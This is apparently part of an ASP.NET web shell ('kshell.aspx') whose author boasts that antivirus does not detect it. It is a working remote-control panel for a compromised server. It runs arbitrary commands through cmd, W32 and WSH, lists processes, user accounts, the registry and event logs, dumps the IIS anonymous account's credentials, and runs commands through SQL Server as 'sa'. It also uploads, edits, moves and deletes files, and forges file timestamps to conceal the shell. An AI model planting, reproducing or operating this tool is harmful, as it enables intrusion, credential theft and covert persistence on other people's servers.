  <p> Execute command with ASP.NET account(<span class="style3">Notice: only click "Run" to run</span>)</p>
  <p>- This function has fixed by kikicoco.Antivirus has not detected (2007/02/27)-</p>
  Command:
  <asp:TextBox ID="cmd" runat="server" Width="300" class="TextBox" />
  <asp:Button ID="Button123" runat="server" Text="Run"  class="buttom"/>  
  <p>
   <asp:Label ID="result" runat="server" style="style2"/>      </p>
</form>
<%
case "cmdw32"
%>
<form runat="server">
<p>[ ASP.NET W32 Shell ]        <i><a href="javascript:history.back(1);">Back</a></i></p>
   <p> Execute command with ASP.NET account using W32(<span class="style3">Notice: only click "Run" to run</span>)</p>
   Command:
<asp:TextBox ID="txtCommand1" runat="server" style="border: 1px solid #084B8E"/>
   <asp:Button ID="Buttoncmdw32" runat="server" Text="Run"  style="color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5"/>  
   <p>
    <asp:Label ID="resultcmdw32" runat="server" style="color: #0000FF"/>      
    </p>
</form>
<%
case "cmdwsh"
%>
<form runat="server">
<p>[ ASP.NET WSH Shell ]        <i><a href="javascript:history.back(1);">Back</a></i></p>
   <p> Execute command with ASP.NET account using WSH(<span class="style3">Notice: only click "Run" to run</span>)</p>
   Command:
<asp:TextBox ID="txtCommand2" runat="server" style="border: 1px solid #084B8E"/>
   <asp:Button ID="Buttoncmdwsh" runat="server" Text="Run"  style="color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5"/>  
   <p>
    <asp:Label ID="resultcmdwsh" runat="server" style="color: #0000FF"/>      
    </p>
</form>
<%
case "pro"
%>
<form runat="server">
<p align=center>[ List processes from server ]        <i><a href="javascript:history.back(1);">Back</a></i></p>
<table align=center>
  <tr>
   <td>
   <%
    Try
    output_wmi_function_data("Win32_Process","Name,ProcessId,HandleCount")
    Catch
    rw("This function is disabled by server")
    End Try
   %>
   </td>
  </tr>
</table>
</form>
<%
case "user"
%>
<form runat="server">
<p align=center>[ List User Accounts ]        <i><a href="javascript:history.back(1);">Back</a></i></p>
<table align=center>
  <tr>
   <td>
   <%
    dim WMI_function = "Win32_UserAccount"  
    dim Fields_to_load = "Name,Domain,FullName,Description,PasswordRequired,SID"
    dim fail_description = " Access to " + WMI_function + " is protected"
    Try
    output_wmi_function_data(WMI_function,Fields_to_load)
    Catch
    rw(fail_description)
    End Try
   %>
   </td>
  </tr>
</table>
</form>
<%
case "reg"
%>
<form runat="server">
<p align=center>[ Registry ]        <i><a href="javascript:history.back(1);">Back</a></i></p>
<table align=center>
  <tr>
   <td>
   <%
    dim WMI_function = "Win32_Registry"  
    dim Fields_to_load = "Caption,CurrentSize,Description,InstallDate,Name,Status"
    dim fail_description = " Access to " + WMI_function + " is protected"
    Try
    output_wmi_function_data(WMI_function,Fields_to_load)
    Catch
    rw(fail_description)
    End Try
   %>
   </td>
  </tr>
</table>
</form>
<%
case "applog"
%>
<form runat="server">
<p align=center>[ List Application Event Log Entries ]        <i><a href="javascript:history.back(1);">Back</a></i></p>
<table align=center>
  <tr>
   <td>
   <%
    dim WMI_function = "Win32_NTLogEvent where Logfile='Application'"  
    dim Fields_to_load = "Logfile,Message,type"
    dim fail_description = " Access to " + WMI_function + " is protected"
    Try
    output_wmi_function_data_instances(WMI_function,Fields_to_load,2000)
    Catch
    rw(fail_description)
    End Try
   %>
   </td>
  </tr>
</table>
</form>
<%
case "syslog"
%>
<form runat="server">
<p align=center>[ List System Event Log Entries ]        <i><a href="javascript:history.back(1);">Back</a></i></p>
<table align=center>
  <tr>
   <td>
   <%
    dim WMI_function = "Win32_NTLogEvent where Logfile='System'"  
    dim Fields_to_load = "Logfile,Message,type"
    dim fail_description = " Access to " + WMI_function + " is protected"
   
    Try
    output_wmi_function_data_instances(WMI_function,Fields_to_load,2000)
    Catch
    rw("This function is disabled by server")
    End Try
   %>
   </td>
  </tr>
</table>
</form>
<%
case "auser"
%>
<form runat="server">
<p align=center>[ IIS List Anonymous' User details ]        <i><a href="javascript:history.back(1);">Back</a></i></p>
<table align=center>
  <tr>
   <td>
   <%
    Try
    IIS_list_Anon_Name_Pass
    Catch
    rw("This function is disabled by server")
    End Try
   %>
   </td>
  </tr>
</table>
</form>
<%
case "sqlrootkit"
%>
<form runat="server">
  <p>[ SqlRootKit.NET for WebAdmin ]        <i><a href="javascript:history.back(1);">Back</a></i></p>
  <p> Execute command with SQLServer account(<span class="style3">Notice: only click "Run" to run</span>)</p>
  <p>Host:
    <asp:TextBox ID="ip" runat="server" Width="300" class="TextBox" Text="127.0.0.1"/></p>
  <p>
  SQL Name:
    <asp:TextBox ID="SqlName" runat="server" Width="50" class="TextBox" Text='sa'/>
  SQL Password:
  <asp:TextBox ID="SqlPass" runat="server" Width="80" class="TextBox"/>
  </p>
  Command:
  <asp:TextBox ID="Sqlcmd" runat="server" Width="300" class="TextBox"/>
  <asp:Button ID="ButtonSQL" runat="server" Text="Run"  class="buttom"/>  
  <p>
   <asp:Label ID="resultSQL" runat="server" style="style2"/>      </p>
</form>
<%
case "del"
  dim a as string
  a=request.QueryString("src")
  call existdir(a)
  call del(a)  
  response.Write("<script>alert(""Delete " & replace(a,"\","\\") & " Success!"");location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(a)) &"'</script>")
case "copy"
  call existdir(request.QueryString("src"))
  session("cutboard")="" & request.QueryString("src")
  response.Write("<script>alert('File info have add the cutboard, go to target directory click paste!');location.href='JavaScript:self.close()';</script>")
case "cut"
  call existdir(request.QueryString("src"))
  session("cutboard")="
" & request.QueryString("src")
  response.Write("<script>alert('File info have add the cutboard, go to target directory click paste!');location.href='JavaScript:self.close()';</script>")
case "paste"
  dim ow as integer
  if request.Form("OverWrite")<>"" then ow=1
  if request.Form("Cancel")<>"" then ow=2
  url=request.QueryString("src")
  call existdir(url)
  dim d as string
  d=session("cutboard")
  if left(d,1)="
" then
   TEMP1=url & path.getfilename(mid(replace(d,"
",""),1,len(replace(d,"
",""))-1))
   TEMP2=url & replace(path.getfilename(d),"
","")
   if right(d,1)="\" then   
    call xexistdir(TEMP1,ow)
    directory.move(replace(d,"
",""),TEMP1 & "\")  
    response.Write("<script>alert('Cut  " & replace(replace(d,"
",""),"\","\\") & "  to  " & replace(TEMP1 & "\","\","\\") & "  success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
   else
    call xexistdir(TEMP2,ow)
    file.move(replace(d,"
",""),TEMP2)
    response.Write("<script>alert('Cut  " & replace(replace(d,"
",""),"\","\\") & "  to  " & replace(TEMP2,"\","\\") & "  success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
   end if
  else
   TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
   TEMP2=url & path.getfilename(replace(d,"",""))
   if right(d,1)="\" then
    call xexistdir(TEMP1,ow)
    directory.createdirectory(TEMP1)
    call copydir(replace(d,"",""),TEMP1 & "\")
    response.Write("<script>alert('Copy  " & replace(replace(d,"",""),"\","\\") & "  to  " & replace(TEMP1 & "\","\","\\") & "  success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
   else
    call xexistdir(TEMP2,ow)
    file.copy(replace(d,"",""),TEMP2)
    response.Write("<script>alert('Copy  " & replace(replace(d,"",""),"\","\\") & "  to  " & replace(TEMP2,"\","\\") & "  success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
   end if
  end if
case "upfile"
  url=request.QueryString("src")
%>
<form name="UpFileForm" enctype="multipart/form-data" method="post" action="?src=<%=server.UrlEncode(url)%>" runat="server"  >
You will upload file to this directory : <span class="style3"><%=url%></span><br>
Please choose file from your computer :
<input name="upfile" type="file" class="TextBox" id="UpFile" runat="server">
    <input type="submit" id="UpFileSubit" value="Upload" runat="server"  class="buttom">
</form>
<a href="javascript:history.back(1);" style="color:#FF0000">Go Back </a>
<%
case "new"
  url=request.QueryString("src")
%>
<form runat="server">
  <%=url%><br>
  Name:
  <asp:TextBox ID="NewName" TextMode="SingleLine" runat="server" class="TextBox"/>
  <br>
  <asp:RadioButton ID="NewFile" Text="File" runat="server" GroupName="New" Checked="true"/>
  <asp:RadioButton ID="NewDirectory" Text="Directory" runat="server"  GroupName="New"/>
  <br>
  <asp:Button ID="NewButton" Text="Submit" runat="server" CssClass="buttom"  />  
  <input name="Src" type="hidden" value="<%=url%>">
</form>
<a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a>
<%
case "edit"
  dim b as string
  b=request.QueryString("src")
  call existdir(b)
  dim myread as new streamreader(b,encoding.default)
  filepath.text=b
  content.text=myread.readtoend
%>
<form runat="server">
  <table width="80%"  border="1" align="center">
    <tr>      <td width="11%">Path</td>
      <td width="89%">
      <asp:TextBox CssClass="TextBox" ID="filepath" runat="server" Width="300"/>
      *</td>
    </tr>
    <tr>
      <td>Content</td>
      <td> <asp:TextBox ID="content" Rows="25" Columns="100" TextMode="MultiLine" runat="server" CssClass="TextBox"/></td>
    </tr>
    <tr>
      <td></td>
      <td> <asp:Button ID="a" Text="Sumbit" runat="server"  CssClass="buttom"/>         
      </td>
    </tr>
  </table>
</form>
<a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a>
<%
    myread.close
case "rename"
  url=request.QueryString("src")
  if request.Form("name")="" then
%>
<form name="formRn" method="post" action="?action=rename&src=<%=server.UrlEncode(request.QueryString("src"))%>" >
  <p>You will rename <span class="style3"><%=request.QueryString("src")%></span>to: <%=getparentdir(request.QueryString("src"))%>
    <input type="text" name="name" class="TextBox">
    <input type="submit" name="Submit3" value="Submit" class="buttom">
</p>
</form>
<a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a>
<script language="javascript">
function checkname()
{
if(formRn.name.value==""){alert("You shall input filename :(");return false}
}
</script>
  <%
  else
   if Rename() then
    response.Write("<script>alert('Rename " & replace(url,"\","\\") & " to " & replace(Getparentdir(url) & request.Form("name"),"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(url)) &"'</script>")
   else
    response.Write("<script>alert('Exist the same name file , rename fail :(');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(url)) &"'</script>")
   end if
  end if
case "samename"
  url=request.QueryString("src")
%>
<form name="form1" method="post" action="?action=paste&src=<%=server.UrlEncode(url)%>">
<p class="style3">Exist the same name file , can you overwrite ?(If you click " no" , it will auto add a number as prefix)</p>
  <input name="OverWrite" type="submit" id="OverWrite" value="Yes" class="buttom">
<input name="Cancel" type="submit" id="Cancel" value="No" class="buttom">
</form>
<a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a>
   <%
    case "clonetime"
  time1.Text=request.QueryString("src")&"kshell.aspx"
  time2.Text=request.QueryString("src")
%>
<form runat="server">
  <p>[CloneTime for WebAdmin]<i>      <a href="javascript:history.back(1);">Back</a></i> </p>
  <p>A tool that it copy the file or directory's time to another file or directory </p>
  <p>Rework File or Dir:
    <asp:TextBox CssClass="TextBox" ID="time1" runat="server" Width="300"/></p>
  <p>Copied File or Dir:     
    <asp:TextBox CssClass="TextBox" ID="time2" runat="server" Width="300"/></p>
<asp:Button ID="ButtonClone" Text="Submit" runat="server" CssClass="buttom" />
</form>
<p>
  <%
case "logout"
     session.Abandon()
  response.Write("<script>alert(' Goodbye !');location.href='" & request.ServerVariables("URL") & "';</sc" & "ript>")
end select
end if
Catch error_x
response.Write("<font color=""red"">Wrong: </font>"&error_x.Message)
End Try
%>
</p>
</p>
<hr>
<script language="javascript">
function closewindow()
{self.close();}
</script>
</body>
</html>